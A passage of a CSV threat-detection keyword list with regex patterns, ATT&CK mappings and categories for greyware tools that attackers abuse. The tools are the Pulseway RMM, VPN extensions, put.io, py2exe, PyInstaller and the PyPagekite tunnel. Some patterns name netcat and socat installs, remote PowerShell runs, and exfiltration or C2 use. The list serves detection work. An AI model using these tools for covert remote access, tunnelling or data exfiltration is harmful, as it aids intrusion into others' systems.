"*rd-eu-ie-1.pulseway.com*",".{0,1000}rd\-eu\-ie\-1\.pulseway\.com.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*rd-us-east-1.pulseway.com*",".{0,1000}rd\-us\-east\-1\.pulseway\.com.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rd-us-east-2.pulseway.com*",".{0,1000}rd\-us\-east\-2\.pulseway\.com.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rd-us-west-1.pulseway.com*",".{0,1000}rd\-us\-west\-1\.pulseway\.com.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Received Request Run PowerShell command '*' from device Id*",".{0,1000}Received\sRequest\sRun\sPowerShell\scommand\s\'.{0,1000}\'\sfrom\sdevice\sId.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*RemoteDesktop.exe*pwy-rd:?token=*",".{0,1000}RemoteDesktop\.exe.{0,1000}pwy\-rd\:\?token\=.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SC QUERYEX ""PC Monitor""*",".{0,1000}SC\s\sQUERYEX\s\""PC\sMonitor\"".{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*service pulseway start*",".{0,1000}service\spulseway\sstart.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*service pulseway stop*",".{0,1000}service\spulseway\sstop.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ServiceName"">Pulseway*",".{0,1000}ServiceName\""\>Pulseway\<\/Data\>.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT 
administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*systemctl start pulseway*",".{0,1000}systemctl\sstart\spulseway.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*systemctl status pulseway*",".{0,1000}systemctl\sstatus\spulseway.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*systemctl stop pulseway*",".{0,1000}systemctl\sstop\spulseway.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*systemprofile\AppData\Roaming\freerdp\server*",".{0,1000}systemprofile\\AppData\\Roaming\\freerdp\\server.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*www.pulseway.com/download/*",".{0,1000}www\.pulseway\.com\/download\/.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*bfidboloedlamgdmenmlbipfnccokknp*",".{0,1000}bfidboloedlamgdmenmlbipfnccokknp.{0,1000}","greyware_tool_keyword","PureVPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*eidnihaadmmancegllknfbliaijfmkgo*",".{0,1000}eidnihaadmmancegllknfbliaijfmkgo.{0,1000}","greyware_tool_keyword","Push VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*https://put.io/?login*",".{0,1000}https\:\/\/put\.io\/\?login.{0,1000}","greyware_tool_keyword","put.io","A storage and torrenting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Data Exfiltration","https://put.io","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*https://put.io/default/magnet?url=*",".{0,1000}https\:\/\/put\.io\/default\/magnet\?url\=.{0,1000}","greyware_tool_keyword","put.io","A storage and torrenting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Collection","https://put.io","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://put.io/transfers*",".{0,1000}https\:\/\/put\.io\/transfers.{0,1000}","greyware_tool_keyword","put.io","A storage and torrenting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Data Exfiltration","https://put.io","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://put.io/v2/oauth2/register*",".{0,1000}https\:\/\/put\.io\/v2\/oauth2\/register.{0,1000}","greyware_tool_keyword","put.io","A storage and torrenting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Data Exfiltration","https://put.io","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* py2exe*",".{0,1000}\spy2exe.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows often used by attackers","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","0","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z" "*/py2exe/*",".{0,1000}\/py2exe\/.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows often used by attackers","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z" 
"*\py2exe*",".{0,1000}\\py2exe.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows often used by attackers","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","0","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z" "*py2exe *",".{0,1000}py2exe\s.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows often used by attackers","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","0","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z" "*py2exe*.exe *",".{0,1000}py2exe.{0,1000}\.exe\s.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows often used by attackers","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","0","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z" "*py2exe*.msi *",".{0,1000}py2exe.{0,1000}\.msi\s.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows often used by attackers","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","0","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z" "*py2exe*.py*",".{0,1000}py2exe.{0,1000}\.py.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert 
Python scripts into standalone executable files for Windows often used by attackers","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","0","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z" "*py2exe-*.tar.gz*",".{0,1000}py2exe\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows often used by attackers","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z" "*py2exe-*.whl*",".{0,1000}py2exe\-.{0,1000}\.whl.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows often used by attackers","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z" "*py2exe.build_exe*",".{0,1000}py2exe\.build_exe.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows often used by attackers","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z" "*py2exe.freeze*",".{0,1000}py2exe\.freeze.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows often used by 
attackers","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z" "*py2exe.git*",".{0,1000}py2exe\.git.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows often used by attackers","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z" "*py2exe_setuptools.py*",".{0,1000}py2exe_setuptools\.py.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows often used by attackers","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z" "*py2exe-master.zip*",".{0,1000}py2exe\-master\.zip.{0,1000}","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows often used by attackers","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","Operation Wocao","N/A","Resource development","https://github.com/py2exe/py2exe","1","1","N/A","greyware_tools high risks of false positives","N/A","9","827","96","2024-07-22T20:05:34Z","2019-03-11T13:16:35Z" "*/pyinstaller/*",".{0,1000}\/pyinstaller\/.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource 
development","https://www.pyinstaller.org/","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*import PyInstaller*",".{0,1000}import\sPyInstaller.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*install pyinstaller*",".{0,1000}install\spyinstaller.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*pyinstaller *.py*",".{0,1000}pyinstaller\s.{0,1000}\.py.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*pyinstaller* --onefile --add-data *",".{0,1000}pyinstaller.{0,1000}\s\-\-onefile\s\-\-add\-data\s.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" 
"*pyinstaller.exe*",".{0,1000}pyinstaller\.exe.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","1","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*pyinstaller/tarball*",".{0,1000}pyinstaller\/tarball.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*pyinstaller-script.py*",".{0,1000}pyinstaller\-script\.py.{0,1000}","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1027.002 - T1045 - T1059.001 - T1587.001","TA0005 - TA0042","N/A","N/A","Resource development","https://www.pyinstaller.org/","1","1","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "* install xvnc4viewer netcat-traditional socat*",".{0,1000}\sinstall\sxvnc4viewer\snetcat\-traditional\ssocat.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "* pagekite.logging*",".{0,1000}\spagekite\.logging.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "* pagekite.py*",".{0,1000}\spagekite\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "* pagekite-gtk.py*",".{0,1000}\spagekite\-gtk\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*""PageKite system service""*",".{0,1000}\""PageKite\ssystem\sservice\"".{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/etc/pagekite.d*",".{0,1000}\/etc\/pagekite\.d.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/pagekite-*.log*",".{0,1000}\/pagekite\-.{0,1000}\.log.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/pagekite.log*",".{0,1000}\/pagekite\.log.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/pagekite.py*",".{0,1000}\/pagekite\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/pagekite-0.3.21.py*",".{0,1000}\/pagekite\-0\.3\.21\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/pagekite-0.4.6a.py*",".{0,1000}\/pagekite\-0\.4\.6a\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/pagekite-0.5.6d.py*",".{0,1000}\/pagekite\-0\.5\.6d\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/pagekite-0.5.8a.py*",".{0,1000}\/pagekite\-0\.5\.8a\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/pagekite-gtk.py*",".{0,1000}\/pagekite\-gtk\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/pagekite-tmp.py*",".{0,1000}\/pagekite\-tmp\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/PyPagekite.git*",".{0,1000}\/PyPagekite\.git.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/PyPagekite/tarball/*",".{0,1000}\/PyPagekite\/tarball\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/PyPagekite/zipball/*",".{0,1000}\/PyPagekite\/zipball\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/var/log/pagekite/*",".{0,1000}\/var\/log\/pagekite\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/var/run/pagekite.pid*",".{0,1000}\/var\/run\/pagekite\.pid.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*[PageKite] Remote connection closed!*",".{0,1000}\[PageKite\]\sRemote\sconnection\sclosed!.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*\pagekite.cfg*",".{0,1000}\\pagekite\.cfg.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*\pagekite.py*",".{0,1000}\\pagekite\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*\pagekite-gtk.py*",".{0,1000}\\pagekite\-gtk\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*23e8d0a95d5769ea14e4fd5eac6b5c111ce538e61b18492c21482afd015170eb*",".{0,1000}23e8d0a95d5769ea14e4fd5eac6b5c111ce538e61b18492c21482afd015170eb.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*7270581d315cffb125f9ac64ebcb6622959c8e9f779b8a07808fd6929b0e746a*",".{0,1000}7270581d315cffb125f9ac64ebcb6622959c8e9f779b8a07808fd6929b0e746a.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" 
"*7dc50c28dc7c2fa9a6ea80df35c06bd649b17ae86d333e88b3bf242ac5690c98*",".{0,1000}7dc50c28dc7c2fa9a6ea80df35c06bd649b17ae86d333e88b3bf242ac5690c98.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*b01db099512e344df190ee405619399c835b1d5522e2e6faa8e47b49418bab66*",".{0,1000}b01db099512e344df190ee405619399c835b1d5522e2e6faa8e47b49418bab66.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*be8fc36ec0082bdb7d20a21ae7098899529bc9b9f6439b1496ca634395598d8a*",".{0,1000}be8fc36ec0082bdb7d20a21ae7098899529bc9b9f6439b1496ca634395598d8a.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*bre@pagekite.net*",".{0,1000}bre\@pagekite\.net.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost 